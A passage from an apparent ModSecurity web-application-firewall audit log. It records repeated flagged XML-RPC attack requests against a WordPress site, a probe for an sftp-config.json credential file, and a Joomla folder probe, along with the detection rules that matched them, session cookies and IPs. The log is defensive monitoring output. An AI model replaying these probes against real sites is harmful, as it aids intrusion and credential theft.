"CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE62_JRtBAxFAusk8b4pOgAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749989116164194 1036094 (- - -) Stopwatch2: 1749989116164194 1036094; combined=3956, p1=503, p2=3003, p3=110, p4=35, p5=183, sr=117, sw=122, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c1b6f417-Z-- --6ee17a7a-A-- [15/Jun/2025:17:36:17.874437 +0530] aE63OJQ5CUFP0kLCSy8ZHAAAAAM 165.22.247.248 52436 127.0.0.1 7081 --6ee17a7a-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 Cookie: PHPSESSID=rflfmrkaddg60tn6juru7pi4ih; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_c5ffa3015ae83066783bdc3383f855%7C%7C1750161976%7C%7C1750158376%7C%7Caab534ad1426c65b15c404f9b3a65250; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=aecdd2b0940b18355f50972858c633cd%7C%7C1750161976%7C%7C1750158376%7C%7Ce033f596d05cb716fbbaecf3b2558b87 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --6ee17a7a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=v2nfuua17tpit9lqpo25sim19h; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_b10b8d534299f3b310224f4684deab%7C%7C1750161977%7C%7C1750158377%7C%7C71ebe77cd777ce38a7b9f8a612d22230; expires=Tue, 17 Jun 2025 12:06:17 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=577291dae12357ddda15e1ed00d88c5c%7C%7C1750161977%7C%7C1750158377%7C%7C29b8e545ad0c6803b093c515c54f5242; expires=Tue, 17 Jun 2025 12:06:17 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --6ee17a7a-E-- --6ee17a7a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (47+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (47+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE63OJQ5CUFP0kLCSy8ZHAAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749989176750670 1123848 (- - -) Stopwatch2: 1749989176750670 1123848; combined=4028, p1=544, p2=3092, p3=100, p4=48, p5=154, sr=135, sw=90, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6ee17a7a-Z-- --69977762-A-- [15/Jun/2025:17:37:17.151276 +0530] aE63dFu1-lKBbvo2E9pFJgAAAAw 165.22.247.248 52464 127.0.0.1 7081 --69977762-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 Cookie: PHPSESSID=s1igngdlqksjr976bt4vo8c1fj; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_5f32f84b272963cd8289393273ada8%7C%7C1750162035%7C%7C1750158435%7C%7Cea84990ef0482a4a1401feb19650d8d8; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=06d2a754183daf4e7a79ecb00f9fc748%7C%7C1750162035%7C%7C1750158435%7C%7C9a7236eb0f0c69d9fbf2b6323afe8b15 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --69977762-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=077vaik2bcc2q5unjbj10iu45g; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_984bcb43603c62146145d7f750a895%7C%7C1750162036%7C%7C1750158436%7C%7C1271d7f99d2bf30570ee8b95d7544e36; expires=Tue, 17 Jun 2025 12:07:16 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=5951552e13ff049f07e509483fe661e8%7C%7C1750162037%7C%7C1750158437%7C%7C5572956013df767965d1637a8a851d89; expires=Tue, 17 Jun 2025 12:07:17 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --69977762-E-- --69977762-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE63dFu1-lKBbvo2E9pFJgAAAAw"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749989236131991 1019365 (- - -) Stopwatch2: 1749989236131991 1019365; combined=2726, p1=398, p2=1945, p3=107, p4=39, p5=147, sr=90, sw=90, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --69977762-Z-- --79744925-A-- [15/Jun/2025:17:38:17.163402 +0530] aE63sA2U8ofTdsKp_yhOzAAAAAU 165.22.247.248 45838 127.0.0.1 7081 --79744925-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 Cookie: PHPSESSID=2qasj1frn0a6q5raoos4vldqm2; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_2c48959dcefc477626cab12d5bc96a%7C%7C1750162095%7C%7C1750158495%7C%7Cbebca5250e6463097297494ecfebf7c7; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=90fd793ad2ff0076e9a04b500e4e20f0%7C%7C1750162095%7C%7C1750158495%7C%7Cf318567c2e908e4954e82f8bf0df2d97 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --79744925-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=bnedjdj8kjn0o039mvn35av2s6; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_57a00fba7bd4d69b37902d94de6c5a%7C%7C1750162096%7C%7C1750158496%7C%7C9efb7cc2202f9d527cbf506911fb07d7; expires=Tue, 17 Jun 2025 12:08:16 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=d1e4dbbdd7c6d0a3c0fe8f3726124636%7C%7C1750162097%7C%7C1750158497%7C%7Ccba370b9b3a763d4267f1d3f08bc8045; expires=Tue, 17 Jun 2025 12:08:17 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --79744925-E-- --79744925-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE63sA2U8ofTdsKp_yhOzAAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749989296148134 1015350 (- - -) Stopwatch2: 1749989296148134 1015350; combined=3796, p1=538, p2=2748, p3=130, p4=45, p5=208, sr=134, sw=127, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --79744925-Z-- --11fcca6a-A-- [15/Jun/2025:17:39:17.225659 +0530] aE637BRnvL96XFagPFC8twAAAAY 165.22.247.248 42188 127.0.0.1 7081 --11fcca6a-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 Cookie: PHPSESSID=ou3o1vjdgq6eeiaqqeqkt880q3; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_e3c60ef1e18ae1ca491b66fd8c68bf%7C%7C1750162155%7C%7C1750158555%7C%7C5d1cd1e1d49a214a87709478d8333629; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=6d2362a0482a56ecaf7f6d67415b349b%7C%7C1750162155%7C%7C1750158555%7C%7C2ee3bbb38247a5925ec83abd024a1256 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --11fcca6a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=tj4irloto25331c6i0n4un0r9e; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_5d8be1ae6719f1665a0fc7ca631f76%7C%7C1750162156%7C%7C1750158556%7C%7C0cfd35a5e42f129dda21f62d1534961d; expires=Tue, 17 Jun 2025 12:09:16 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=22b125e24460f537cd98ce601db0bfd9%7C%7C1750162157%7C%7C1750158557%7C%7Ca1aed30b20fde0dcc1a8948a7c5b2f9c; expires=Tue, 17 Jun 2025 12:09:17 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --11fcca6a-E-- --11fcca6a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE637BRnvL96XFagPFC8twAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749989356188529 1037222 (- - -) Stopwatch2: 1749989356188529 1037222; combined=2789, p1=378, p2=1981, p3=113, p4=41, p5=171, sr=88, sw=105, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --11fcca6a-Z-- --38066f4a-A-- [15/Jun/2025:17:39:33.413925 +0530] aE63_Hrzia-Xuz8LZxROHQAAAAg 13.38.123.21 48376 127.0.0.1 7081 --38066f4a-B-- GET /sftp-config.json HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 13.38.123.21 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept-Encoding: gzip, deflate Accept: */* --38066f4a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://archangledesignstudio.com/wp-json/>; rel="https://api.w.org/" Vary: User-Agent Connection: close Content-Type: text/html; charset=UTF-8 --38066f4a-H-- Message: Warning. Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "archangledesignstudio.com"] [uri "/sftp-config.json"] [unique_id "aE63_Hrzia-Xuz8LZxROHQAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749989372481865 932137 (- - -) Stopwatch2: 1749989372481865 932137; combined=1822, p1=386, p2=1311, p3=0, p4=0, p5=125, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --38066f4a-Z-- --2aaba13e-A-- [15/Jun/2025:17:40:18.104212 +0530] aE64KQ2U8ofTdsKp_yhO_QAAAAU 165.22.247.248 55602 127.0.0.1 7081 --2aaba13e-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 Cookie: PHPSESSID=s44lab20f57d856qlq2tv7kk7j; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_b72705b8913c05d447059f3b770942%7C%7C1750162216%7C%7C1750158616%7C%7C316a2e2db22b8763ddd905152dace384; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=ae9c9a860d6ebb5b309345cae1b2e0e8%7C%7C1750162216%7C%7C1750158616%7C%7C52f473be303f3654ed8d211b588418ef User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --2aaba13e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=v4hl1cverathm805t83a6eap89; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_aac65470a8eb23325370fed0c60b03%7C%7C1750162217%7C%7C1750158617%7C%7C76ed9cf918c47393dc840e178763d9b1; expires=Tue, 17 Jun 2025 12:10:17 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=ddf610c98b625be984584bb5f5aac9d7%7C%7C1750162218%7C%7C1750158618%7C%7C86cbd219b6f23e18871b8adf26205e1f; expires=Tue, 17 Jun 2025 12:10:18 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --2aaba13e-E-- --2aaba13e-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (47+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (47+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE64KQ2U8ofTdsKp_yhO_QAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749989417059700 1044598 (- - -) Stopwatch2: 1749989417059700 1044598; combined=3636, p1=571, p2=2644, p3=93, p4=34, p5=179, sr=129, sw=115, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2aaba13e-Z-- --3f3ea658-A-- [15/Jun/2025:17:41:11.179809 +0530] aE64Xw9BijgXpeeI_r_DuAAAAAE 172.190.142.176 33676 127.0.0.1 7080 --3f3ea658-B-- GET /images/stories/admin-post.php HTTP/1.0 Host: deckstory.com X-Real-IP: 172.190.142.176 Connection: close --3f3ea658-F-- HTTP/1.1 404 Not Found Content-Length: 259 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f3ea658-H-- Message: Warning. String match ".php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||deckstory.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. String match ".php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||deckstory.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] [hostname "deckstory.com"] [uri "/images/stories/admin-post.php"] [unique_id "aE64Xw9BijgXpeeI_r_DuAAAAAE"] Stopwatch: 1749989471176123 3741 (- - -) Stopwatch2: 1749989471176123 3741; combined=2271, p1=443, p2=1686, p3=35, p4=33, p5=74, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3f3ea658-Z-- --6462bb6a-A-- [15/Jun/2025:17:41:18.669515 +0530] aE64ZVirsA1ruSKrNWSZHQAAAAQ 165.22.247.248 38118 127.0.0.1 7081 --6462bb6a-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 Cookie: PHPSESSID=7uqt6aghkq6jemgikego45ef2d; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_63ecd91fd5303dd53f21e006ea4e58%7C%7C1750162277%7C%7C1750158677%7C%7C6c48e6340b96124e1853dd4f1165631b; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=b69692c91ceaf4f14b414ed6674f0eda%7C%7C1750162277%7C%7C1750158677%7C%7Cdc6e9ac4a424f00cd66cc51c59601165 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --6462bb6a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=te57so0t6euni8sq4fm8pdrjfc; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_435e685cd11c870db55c960b118344%7C%7C1750162278%7C%7C1750158678%7C%7Cbb09716eeca892d8c54cfae8c526fc6b; expires=Tue, 17 Jun 2025 12:11:18 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=6124570b472b20ded32dce45a1409443%7C%7C1750162278%7C%7C1750158678%7C%7Caa4a0f25ffb775df6e58f51fb93167fb; expires=Tue, 17 Jun 2025 12:11:18 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --6462bb6a-E-- --6462bb6a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE64ZVirsA1ruSKrNWSZHQAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749989477612591 1057050 (- - -) Stopwatch2: 1749989477612591 1057050; combined=4026, p1=484, p2=2998, p3=142, p4=62, p5=212, sr=120, sw=128, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6462bb6a-Z-- --29567627-A-- [15/Jun/2025:17:42:19.163481 +0530] aE64ohRnvL96XFagPFC9EQAAAAY 165.22.247.248 56730 127.0.0.1 7081 --29567627-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 Cookie: PHPSESSID=ese1g24d06f67iqm39n1mt1a0q; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_c947d0818712588547ca6d12f3b3e2%7C%7C1750162337%7C%7C1750158737%7C%7C7e0cba5eacf23cb69f3067440d0afdf1; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=8ed2860e84dfbf9cf80bcd4c6044aa16%7C%7C1750162337%7C%7C1750158737%7C%7C2e9a8621efee95a0a1d94fcecaaf0b02 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --29567627-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=2p8816gt8ce6gu0qa7c6l8v1vv; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_9c1ea8dd5b804e824ada665080a16e%7C%7C1750162338%7C%7C1750158738%7C%7C782ffe4c6e40323fc84db8e20802680f; expires=Tue, 17 Jun 2025 12:12:18 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=445c77dbe6bf76eb0258320af74f8b60%7C%7C1750162339%7C%7C1750158739%7C%7C1f02d7f4072d897a8f82e771854daa7a; expires=Tue, 17 Jun 2025 12:12:19 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --29567627-E-- --29567627-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (47+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (47+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE64ohRnvL96XFagPFC9EQAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749989538121580 1042014 (- - -) Stopwatch2: 1749989538121580 1042014; combined=2967, p1=381, p2=2083, p3=127, p4=52, p5=206, sr=93, sw=118, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --29567627-Z-- --000b341f-A-- [15/Jun/2025:17:43:19.129636 +0530] aE643l97WYuiWZZK24X9BAAAAAI 165.22.247.248 58944 127.0.0.1 7081 --000b341f-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 493 Cookie: PHPSESSID=kjkqinej80pn9th91kul9elqah; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_667edd6ef3fc1a7fe53b1611f9e41c%7C%7C1750162397%7C%7C1750158797%7C%7Cd91d974cfbcba8cc931758896324974b; 